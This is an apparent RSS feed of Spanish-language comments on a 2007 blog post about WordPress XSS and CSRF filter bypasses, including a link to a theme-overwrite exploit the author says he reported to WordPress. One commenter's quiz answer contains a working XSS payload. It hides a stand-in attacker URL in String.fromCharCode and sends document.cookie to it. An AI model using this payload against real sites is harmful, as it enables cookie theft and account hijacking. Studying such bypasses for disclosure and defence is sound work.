Comentarios en: WordPress, XSS y CSRF – Parte 2 http://www.buayacorp.com/archivos/wordpress-xss-y-csrf-parte-2/ Diseño y Programación Wed, 08 Feb 2012 16:34:31 +0000 hourly 1 Por: » Blog Archive » Actualizacion Wordpress 2.1.3 http://www.buayacorp.com/archivos/wordpress-xss-y-csrf-parte-2/#comment-10384 » Blog Archive » Actualizacion Wordpress 2.1.3 Wed, 28 Mar 2007 18:14:12 +0000 http://www.buayacorp.com/archivos/wordpress-xss-y-csrf-parte-2/#comment-10384 [...] Wordpress, XSS y CSRF - Parte 2 [...] [...] WordPress, XSS y CSRF - Parte 2 [...]

]]> Por: g30rg3_x http://www.buayacorp.com/archivos/wordpress-xss-y-csrf-parte-2/#comment-10249 g30rg3_x Mon, 19 Mar 2007 17:51:49 +0000 http://www.buayacorp.com/archivos/wordpress-xss-y-csrf-parte-2/#comment-10249 Bueno realmente lo intente meter dentro de ese tag [ code][ /code] Pero siempre se filtra todo lo que entre directamente entre "<" y ">", ahora (por que a la hora que vi tu quiz y lo respondi era bastante tarde aqui en mex :P) pues que ya tuve mas tiempo pude ver que tengo que meter esos caracteres como su Entidad HTML para evitar el filtrado. Aqui te dejo lo considere mi respuesta a tu quiz... [code] .http://host/"><body onload="document.location=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,119,101,98,45,100,101,108,45,97,116,97,99,97,110,116,101,46,99,111,109,47,114,111,98,97,95,99,111,111,107,105,101,115,46,112,104,112,63,97,61)%2Bdocument.cookie">.php [/code] Saludos Bueno realmente lo intente meter dentro de ese tag [ code][ /code]
Pero siempre se filtra todo lo que entre directamente entre "<" y ">", ahora (por que a la hora que vi tu quiz y lo respondi era bastante tarde aqui en mex :P ) pues que ya tuve mas tiempo pude ver que tengo que meter esos caracteres como su Entidad HTML para evitar el filtrado.

Aqui te dejo lo considere mi respuesta a tu quiz...

code: 
 
.<a href="http://host/" rel="nofollow">http://host/</a>"><body onload="document.location=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,119,101,98,45,100,101,108,45,97,116,97,99,97,110,116,101,46,99,111,109,47,114,111,98,97,95,99,111,111,107,105,101,115,46,112,104,112,63,97,61)%2Bdocument.cookie">.php
 

Saludos

]]> Por: Wordpress, XSS y CSRF - Final http://www.buayacorp.com/archivos/wordpress-xss-y-csrf-parte-2/#comment-10248 Wordpress, XSS y CSRF - Final Mon, 19 Mar 2007 13:05:13 +0000 http://www.buayacorp.com/archivos/wordpress-xss-y-csrf-parte-2/#comment-10248 [...] Últimos comentarios Alex en: Wordpress, XSS y CSRF - Parte 2 [...] [...] Últimos comentarios Alex en: WordPress, XSS y CSRF - Parte 2 [...]

]]> Por: alex http://www.buayacorp.com/archivos/wordpress-xss-y-csrf-parte-2/#comment-10247 alex Mon, 19 Mar 2007 12:16:36 +0000 http://www.buayacorp.com/archivos/wordpress-xss-y-csrf-parte-2/#comment-10247 En efecto g30rg3_x, sólo es usar una etiqueta que no necesite cerrarse. El ejemplo que envié al equipo de Wordpress es el siguiente, dependiendo de los permisos que tenga la <em>víctima</em>, es posible sobreescribir los archivos del tema actual sin ser afectados por la protección contra ataques CSRF que ofrece Wordpress. http://www.buayacorp.com/files/wordpress/wordpress-theme-exploit.txt Saludos PS. Si deseas poner código "peligroso", puedes hacerlo usando las etiquetas [ code][ /code] (sin los espacios) En efecto g30rg3_x, sólo es usar una etiqueta que no necesite cerrarse.

El ejemplo que envié al equipo de WordPress es el siguiente, dependiendo de los permisos que tenga la víctima, es posible sobreescribir los archivos del tema actual sin ser afectados por la protección contra ataques CSRF que ofrece WordPress.
http://www.buayacorp.com/files/wordpress/wordpress-theme-exploit.txt

Saludos
PS. Si deseas poner código "peligroso", puedes hacerlo usando las etiquetas [ code][ /code] (sin los espacios)

]]> Por: g30rg3_x http://www.buayacorp.com/archivos/wordpress-xss-y-csrf-parte-2/#comment-10246 g30rg3_x Mon, 19 Mar 2007 09:10:55 +0000 http://www.buayacorp.com/archivos/wordpress-xss-y-csrf-parte-2/#comment-10246 Bueno es muy facil... Realmente el chiste es que no usemos "/" y que todo termine como .php, lo ultimo es muy facil y el primero es un poquito (muy poquito) mas dificil, realmente usando algun tag que no se tenga que cerrar y puedes meter codigo "malicioso" lo pasas Bueno tus website/filtros no me dejan pues poner mi respuesta de manera completa asi que la explicare... Usamos el atributo onload del tag body, -asi como tu caso de meneame-, para evitar usar algun tag de cierre como lo tiene el tag script y claro para hacer que se mueva a otro sitio digamos la "web-del-atacante.com" donde lo espera un script en php que tome la variable por GET cookie para guardar la cookie procedente del website de la victima. Ahora solo queda pues poner eso en lugar de XSS y terminarlo con .php para que se ejecute... Para evitar el uso de "/" dentro de la cadena de url usamos el metodo fromCharCode de la clase String y asi podremos pasar bastante la proteccion... Eso es todo, asi de simple y facil... Saludos Bueno es muy facil...
Realmente el chiste es que no usemos "/" y que todo termine como .php, lo ultimo es muy facil y el primero es un poquito (muy poquito) mas dificil, realmente usando algun tag que no se tenga que cerrar y puedes meter codigo "malicioso" lo pasas

Bueno tus website/filtros no me dejan pues poner mi respuesta de manera completa asi que la explicare...
Usamos el atributo onload del tag body, -asi como tu caso de meneame-, para evitar usar algun tag de cierre como lo tiene el tag script y claro para hacer que se mueva a otro sitio digamos la "web-del-atacante.com" donde lo espera un script en php que tome la variable por GET cookie para guardar la cookie procedente del website de la victima.
Ahora solo queda pues poner eso en lugar de XSS y terminarlo con .php para que se ejecute...

Para evitar el uso de "/" dentro de la cadena de url usamos el metodo fromCharCode de la clase String y asi podremos pasar bastante la proteccion...

Eso es todo, asi de simple y facil...

Saludos

]]>